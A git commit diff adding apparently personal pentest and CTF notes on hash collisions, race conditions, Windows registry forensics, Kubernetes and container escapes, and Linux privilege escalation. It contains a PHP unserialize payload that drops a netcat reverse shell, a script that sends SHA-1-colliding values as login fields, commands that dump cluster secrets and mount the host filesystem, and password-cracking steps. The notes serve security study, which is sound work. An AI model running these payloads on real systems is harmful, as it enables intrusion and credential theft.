Compare commits

..

2 Commits

Author SHA1 Message Date
Stefan Friese 27f267281d bump 2022-01-21 21:55:06 +01:00
Stefan Friese 61437ed2ca bump 2022-01-21 21:54:15 +01:00
11 changed files with 262 additions and 3 deletions

View File

@ -0,0 +1,33 @@
# Hash Collisions
# SHA-1
* http://shattered.io
* The following code is taken from a writeup from [bl4ade's repo](https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md)
```python
#!/usr/bin/env python
import requests
# this is copy/paste from Hex editor - two different files with the same SHA1 checksum
name = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
print '[+] create URL decoded strings to send as GET parameters [name] and [password]...'
name = ''.join(name.split(' '))
password = ''.join(password.split(' '))
namestr = ''.join(['%' + name[i] + name[i + 1]
for i in range(0, len(name)) if i % 2 == 0])
passwordstr = ''.join(['%' + password[j] + password[j + 1]
for j in range(0, len(password)) if j % 2 == 0])
print '[+] sending request to http://54.202.82.13/?name=[name]&password=[password]'
u = 'http://54.202.82.13/?name={}&password={}'.format(namestr, passwordstr)
resp = requests.get(u, headers={
'Host': '54.202.82.13'
})
```

View File

@ -0,0 +1,22 @@
# Racing Conditions
## Read files from another user
* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it
* The file of intereset is called `root_credentials` and is owned by root
* Create a file
```sh
touch yo
```
* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0)
```sh
gcc gistfile.c -o rename_file
```
* Inside session 1 start the binary
```sh
./rename_file yo root_credentials
```
* Inside session to try to read `root_credentials` until it succeeds
```sh
./read_creds root_credentials
```

View File

@ -50,6 +50,7 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20..
* `/etc/profile`
* `/proc/version`
* `/etc/passwd`
* `/etc/apache2/.htpasswd`
* `/etc/shadow`
* `/etc/group`
* `/etc/motd`

View File

@ -1,6 +1,6 @@
# Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
* Serialize via
```php
@ -18,3 +18,12 @@ class FormSubmit {
print urlencode(serialize(new FormSubmit));
?>
```
```php
<?php class file
{
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
}
echo (serialize(new file));
?>
```

View File

@ -0,0 +1,116 @@
# Windows Registry
## Regedit Keys
* HKEY_CURRENT_USER (HKCU), inside HKU
* HKEY_USERS (HKU)
* HKEY_LOCAL_MACHINE (HKLM)
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
* `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
* HKEY_CURRENT_CONFIG
## Paths
* `C:\Windows\System32\Config`
* Default -> `HKEY_USERS\DEFAULT`
* SAM -> `HKEY_LOCAL_MACHINE\SAM`
* SECURITY -> `HKEY_LOCAL_MACHINE\Security`
* SOFTWARE -> `HKEY_LOCAL_MACHINE\Software`
* SYSTEM -> `HKEY_LOCAL_MACHINE\System`
* `C:\Users\<username>\`
* NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file
* `C:\Users\<username>\AppData\Local\Microsoft\Windows`
* USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file
* `C:\Windows\AppCompat\Programs\Amcache.hve`
### Transaction Logs
* Saved inside the same directory as the hive which was altered.
### Backups
* Saved every ten days
* `C:\Windows\System32\Config\RegBack`
## Data Acquisition
* Tools
* `Autopsy`
* `FTK Imager`, does not copy `Amcache.hve`
* `KAPE`, preserves directory tree
* `Registry Viewer`
* `Zimmerman's Registry Explorer`, uses transaction logs as well
* ` AppCompatCache Parser`
* `RegRipper`, cli and gui
## System Information
* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion`
* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName`
* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation`
* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces`
* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed`
* Services -> `SYSTEM\CurrentControlSet\Services`
* Service will start at boot with `start` key value `0x02`
* Users, SAM -> `SAM\Domains\Account\Users`
### Control Sets
* `ControlSet001` -> last boot
* `ControlSet002` -> last known good
* `HKLM\SYSTEM\CurrentControlSet` -> live
* Can be found under:
* `SYSTEM\Select\Current` shows the used control set
* `SYSTEM\Select\LastKnownGood`
## Autostart Programs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
## Recent Files
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg
* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word`
* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU`
## ShellBags
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags`
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
## Last Open/Saved/Visited Dialog MRUs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU`
## Explorer Address/Search Bars
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery`
## User Assist
* GUI applications launched by the user
* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count`
## Shim Cache
* Application Compatibility, AppCompatCache
* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache`
* Use `AppCompatCacheParser.exe --csv <path to save output> -f <path to SYSTEM hive for data parsing> -c <control set to parse>`
### AmCache
* `C:\Windows\appcompat\Programs\Amcache.hve`
* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\`
* Saves SHA1 of the last executed app
## Background Activity Monitor/Desktop Activity Moderator BAM/DAM
* Saves full path of executed apps
* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`
* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}`
## Devices
* Identification
* USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB`
* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices`
* First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064`
* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066`
* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067`

View File

@ -0,0 +1,19 @@
# SMB Response Request
* Network traffic of the SMB handshake is needed
* Fields are
* username
* domain
* server challenge
* ntproofstring
* NTLMv2Response with ommited hex of type like 'ntlmProofStr' at the start
## Usage
* Format the fields
```sh
username::domain:serverChallenge:ntproofstring:NTLMv2Response
```
* Use john to decrypt

View File

@ -56,8 +56,6 @@ groups
* Mount the host volume and chroot to it, need alpine image.
```sh
docker images
```sh
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
or
@ -99,6 +97,7 @@ echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
* The file may appear outside the container on the host system
## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed

View File

@ -0,0 +1,56 @@
# Kubernetes
## Account Token
* Snatch an account token from inside a pod
* Use it via kubectl, watch out for authorizations and namespaces
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 auth can-i --list
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get namespaces
```
* Save secrets from namespaces as yaml file
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -n kube-system
```
* Specify secret
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml
```
## Privilege Escalation
* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
* Show images via
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pods
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pod <image> -o yaml
```
* Use a found image to create the following yaml file
```yaml
apiVersion: v1
kind: Pod
metadata:
name: attacking-pod
spec:
containers:
- image: <imageName>
name: host
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
- mountPath: /host
name: host
volumes:
- name: host
hostPath:
path: /
type: Directory
```
* `/` of the node is mounted to `/host` inside the new pod
* Create the pod via
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 apply -f <filename.yaml>
```
* Run an interactive session on the pod
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bassh
```

View File

@ -0,0 +1,3 @@
# Pithus Mobile Threat Intelligence
* https://beta.pithus.org

View File

@ -27,6 +27,7 @@ find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
* e.g. `john --wordlist=./wordlist --format=crypt hash`
* SUID
* list
```sh